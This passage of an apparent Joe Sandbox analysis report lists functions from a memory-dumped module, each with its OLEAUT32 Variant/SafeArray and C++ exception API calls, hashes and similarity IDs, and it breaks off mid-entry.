                                                                                                          • Instruction ID: 902bc34e70cfd86583bc629b134ae5fc596fa389311d768f61ba421976a13904
                                                                                                          • Opcode Fuzzy Hash: 493a0c87f79095fd379438d56f8b66cb01de371deb2942efa01b3c6a1f8e384d
                                                                                                          • Instruction Fuzzy Hash: 05C171B1A00605EFDB14DF68CD80FADB7B9AF85308F1041A9E949EB286DB71ED41CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F043690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Init$Clear$Copy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3833040332-0
                                                                                                          • Opcode ID: a60481640f25b21fa071f6b7622b82e07a01974d9823d9a3f7055be92195a5c3
                                                                                                          • Instruction ID: 941f8a980b867a4ceb35303ae1f01dbff1507e7bac54092255074708d3dbbf28
                                                                                                          • Opcode Fuzzy Hash: a60481640f25b21fa071f6b7622b82e07a01974d9823d9a3f7055be92195a5c3
                                                                                                          • Instruction Fuzzy Hash: 07816BB5900619EFDB14DFA8C884FEEBBB9FF49304F14416DE905AB241DB35A905CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04D880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04D8EC
                                                                                                          • VariantInit.OLEAUT32 ref: 6F04D902
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04D90D
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F04D929
                                                                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6F04D966
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04D973
                                                                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6F04D9B4
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04D9C1
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04DA6F
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04DA80
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04DA87
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04DA99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 1625659656-0
                                                                                                          • Opcode ID: b78aec5822e8a863f4e7eea1a0d3e28cfa15a48050a11d6feae97fcfe970f89b
                                                                                                          • Instruction ID: ff0c0e089639b7e05c89c66ee9126732e6acda27bcf37bdfa52d521f42674c31
                                                                                                          • Opcode Fuzzy Hash: b78aec5822e8a863f4e7eea1a0d3e28cfa15a48050a11d6feae97fcfe970f89b
                                                                                                          • Instruction Fuzzy Hash: 47812576208701DFC700CF68C884B5AB7E5FFC9724F148A6DE9949B251EB74E905CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0312A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                          • String ID: invalid string position$string too long
                                                                                                          • API String ID: 2168136238-4289949731
                                                                                                          • Opcode ID: e254aa426ea720005d5845c398b48bac5159083b4fe450c41ae0ce37d3a77aff
                                                                                                          • Instruction ID: de5b18a11a07c49b636f673033c6bf965a7731650918f6d8226bdd8441547e93
                                                                                                          • Opcode Fuzzy Hash: e254aa426ea720005d5845c398b48bac5159083b4fe450c41ae0ce37d3a77aff
                                                                                                          • Instruction Fuzzy Hash: DB41C732F002259BD714DE6CDE80B5EB3E6EB8D7547600A2EE492C7B81C774E8458BA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F037370 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 131COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6F0A11FD,000000FF,?,6F038B80,00000000,?,00000000,?,6F038C13,?,?), ref: 6F037415
                                                                                                          • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6F0A11FD,000000FF,?,6F038B80,00000000,?,00000000,?,6F038C13,?,?), ref: 6F03741B
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03743D
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F037452
                                                                                                          • std::exception::exception.LIBCMT ref: 6F037461
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F037476
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C04
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C1E
                                                                                                            • Part of subcall function 6F089BB5: __CxxThrowException@8.LIBCMT ref: 6F089C2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
                                                                                                          • String ID: 0Bo$0Bo$0Bo
                                                                                                          • API String ID: 189561132-1088187309
                                                                                                          • Opcode ID: 86935e38baa5a305c2b4e57fe782dee590aef99407ec11fd01a3f6a3061af0f4
                                                                                                          • Instruction ID: e4239515100c9f181b42ad6afa559478dff3e39ca0c05f74a594ac80b37cfe85
                                                                                                          • Opcode Fuzzy Hash: 86935e38baa5a305c2b4e57fe782dee590aef99407ec11fd01a3f6a3061af0f4
                                                                                                          • Instruction Fuzzy Hash: 73416AB6904648AFCB11CF59C840B9AFBF8FB59310F40856EE81A97B40D775F904CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025AAC Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025ACB
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025ABC
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025AE0
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025B18
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F025B2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                                          • String ID: 0Bo$0Bo$0Bo$0Bo
                                                                                                          • API String ID: 921928366-1187963873
                                                                                                          • Opcode ID: e82d8b2817bb921a1130feaa5a75441aca9f4838fe908846a072587ff027b7cf
                                                                                                          • Instruction ID: a8cbc5f87dc415a63ad8e05053910a1bde59f1e400c6ad935ef1725661c795af
                                                                                                          • Opcode Fuzzy Hash: e82d8b2817bb921a1130feaa5a75441aca9f4838fe908846a072587ff027b7cf
                                                                                                          • Instruction Fuzzy Hash: 400140B6810308BBDF04EFE8D840BDE77F8AF55744F408169E819A7284EB31E604CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F044BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F044BDC
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F044BE5
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F044BEB
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F044BF6
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F044C2A
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044C37
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F045107
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F045117
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04511D
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F045123
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 2515392200-0
                                                                                                          • Opcode ID: 9701d68be7c5d63720e9f52b11ad3bde61f1f24924359e03a9f040289cd76ad2
                                                                                                          • Instruction ID: 81e0542952810acfc316f2de08a157d0e20eabcae70c83ef4d7ffe064791ac68
                                                                                                          • Opcode Fuzzy Hash: 9701d68be7c5d63720e9f52b11ad3bde61f1f24924359e03a9f040289cd76ad2
                                                                                                          • Instruction Fuzzy Hash: 3712E479A15705AFC758DB98DD84DAEB3B9BF8D300F144668F50AABB91CA30F841CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0449B0 Relevance: 15.2, APIs: 10, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(6F0A05A8), ref: 6F0449EE
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F0449F7
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F0449FD
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F044A08
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F044A39
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044A45
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F044B66
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044B76
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044B7C
                                                                                                          • VariantClear.OLEAUT32(6F0A05A8), ref: 6F044B82
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 2515392200-0
                                                                                                          • Opcode ID: 993cf3c88ff45784d3956a5b0995db482405419a3dda53800aa96ea2d5fb50da
                                                                                                          • Instruction ID: 2b4c3fea1bab04cf36b3d77ef55357668c7556221ddfeb528dce657843de0c0a
                                                                                                          • Opcode Fuzzy Hash: 993cf3c88ff45784d3956a5b0995db482405419a3dda53800aa96ea2d5fb50da
                                                                                                          • Instruction Fuzzy Hash: EF515C76A00619EFDB04DFA4CC84FAEB7B8FF89314F144169E915EB245DB35A901CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0447D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04480C
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F044815
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04481B
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F044826
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6F04485B
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044868
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F044974
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044984
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04498A
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044990
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 2515392200-0
                                                                                                          • Opcode ID: 774831f55d13ea055aa4f35bdbb456ba70cbab75104ddbc0c6d8b9a5ced78aba
                                                                                                          • Instruction ID: 5005feceed9f493bc361a451665aa22a8c57e48886eade40de81af17ec1d477b
                                                                                                          • Opcode Fuzzy Hash: 774831f55d13ea055aa4f35bdbb456ba70cbab75104ddbc0c6d8b9a5ced78aba
                                                                                                          • Instruction Fuzzy Hash: CB516D76900209EFDB04DFA8CC80EAEB7B9FF89310F14456DE905EB650DB30A905DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03DCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F03DD00
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6F03DD10
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,6F042FFF,?), ref: 6F03DD47
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03DD4F
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,6F042FFF,?), ref: 6F03DD6D
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6F03DDA4
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03DDAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F03DE16
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F03DE27
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03DE31
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 3525949229-0
                                                                                                          • Opcode ID: 774f3a0d6e01a371e0020e51de232f8f623aed3b88677b37d8f0843499a5b504
                                                                                                          • Instruction ID: cffb5eaa26a98cd7bb6189f8ec63298f36a471710ee76379daa99b4859e935c7
                                                                                                          • Opcode Fuzzy Hash: 774f3a0d6e01a371e0020e51de232f8f623aed3b88677b37d8f0843499a5b504
                                                                                                          • Instruction Fuzzy Hash: 34515E76A0161AAFDB01EFA4C884FDFBBB9FF59310F018119EA1597351DB35A901CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05C1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F05C213
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
                                                                                                          • API String ID: 1823113695-1254974138
                                                                                                          • Opcode ID: ed2cd5e96728db21265262c7fb883629d58661bc2cccc1d171b83f0ada83e8ee
                                                                                                          • Instruction ID: 95dcc355382f44ab986a00cf640112d3dfe6735789dde9daa74d82f4a1925641
                                                                                                          • Opcode Fuzzy Hash: ed2cd5e96728db21265262c7fb883629d58661bc2cccc1d171b83f0ada83e8ee
                                                                                                          • Instruction Fuzzy Hash: 799176B5A00209AFCB18CF59DD90FAEB7B9EB88314F04861DE959D7380D770BA14CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F030CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
